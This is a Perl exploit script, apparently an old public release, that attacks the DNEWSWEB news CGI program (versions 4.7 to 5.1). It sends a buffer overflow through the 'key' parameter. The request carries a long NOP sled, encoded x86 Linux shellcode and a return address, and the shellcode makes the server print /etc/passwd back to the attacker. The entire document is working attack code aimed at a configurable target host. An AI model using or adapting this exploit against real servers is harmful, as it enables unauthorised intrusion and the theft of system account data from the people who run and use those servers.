#!/usr/local/bin/perl 
#
# DNEWSWEB cgi exploiter for Linux by djHD 
# all versions from 4.7 up to 5.1
# maybe older and younger
# Buffer overflow 
# Example of getting /etc/passwd
# you need access to one group at least

use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $ua = new LWP::UserAgent;

# *************************************************
my $TargetHost="www.target.com";
my $TargetPath="/cgi-bin/dnewsweb";
# news group must exist and you must have access to it
my $TargetGroup="alt.christnet.comp.dcom.telecom";
# **************************************************

my $url="http://".$TargetHost.$TargetPath."?cmd=xsearch&group=".$TargetGroup."&key=";
my $egg="%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%eb%02%eb%05%e8%f9%ff%ff%ff%5e%b8%14%1a%14%1a%d1%e8%89%46%7b%31%c0%89%c3%43%89%c2%b2%1b%b0%04%8d%4e%64%cd%80%31%c0%89%c3%b3%8a%88%04%1e%89%c2%89%c1%8d%5e%7f%b0%05%cd%80%d1%d0%72%29%d1%d8%89%c7%89%fb%31%c0%89%c2%b0%03%b2%f0%89%f1%29%d1%cd%80%85%c0%74%11%31%db%89%c2%89%d8%b0%04%43%89%f1%29%d1%cd%80%eb%db%31%c0%b0%01%31%db%cd%80%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%74%65%78%74%2f%68%74%6d%6c%0d%0a%0d%0a%2f%65%74%63%2f%70%61%73%73%77%64%20XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%01%e9%ff%bf";

$url=$url.$egg;

 my $request = new HTTP::Request('GET', $url);
 my $response = $ua->request($request);
 if ($response->is_success) {
      print $response->content;
 } else {
      print $response->error_as_HTML;
 }